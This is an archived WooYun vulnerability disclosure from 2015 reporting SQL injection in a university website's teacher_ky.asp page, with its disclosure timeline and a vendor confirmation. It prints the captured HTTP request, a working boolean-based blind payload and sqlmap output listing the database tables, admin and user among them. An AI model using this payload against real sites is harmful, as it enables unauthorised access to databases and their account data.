乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-21: 细节已通知厂商并且等待厂商处理中 2015-11-23: 厂商已经确认,细节仅向厂商公开 2015-12-03: 细节向核心白帽子及相关领域专家公开 2015-12-13: 细节向普通白帽子公开 2015-12-23: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
多处存在注入,多处存在注入,多处存在注入
列举一个
GET /teacher_ky.asp?id=339 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://www.bs.ecnu.edu.cnCookie: ASPSESSIONIDCCBAADAS=MBIECIJCEFIPMPFLEIHLMOOO; CNZZDATA16822a9=1; Hm_lvt_0ba2040c6872271f07fcbf62884d6d58=1447398800; Hm_lpvt_0ba2040c6872271f07fcbf62884d6d58=1447398800; CNZZDATA3933165=cnzz_eid%3D1122643001-1447396087-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447396087; HMACCOUNT=29C0C6C6AABFA2C0; Hm_lvt_3fe5b2b119b5fc4931e9c73e7071b0c6=1447398816; Hm_lpvt_3fe5b2b119b5fc4931e9c73e7071b0c6=1447398816; bdshare_firstime=1447398823025; BAIDUID=716ADCC0CCB6DA5BFD57CF328BE09635:FG=1Host: www.bs.ecnu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
id参数存在注入
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=339 AND 6392=6392---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft Access
---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP, Microsoft IIS 7.0back-end DBMS: Microsoft AccessDatabase: Microsoft_Access_masterdb[8 tables]+----------+| user || admin || download || feedback || market || news || product || vote |+----------+
危害等级:高
漏洞Rank:10
确认时间:2015-11-23 15:18
通知二级单位处理
暂无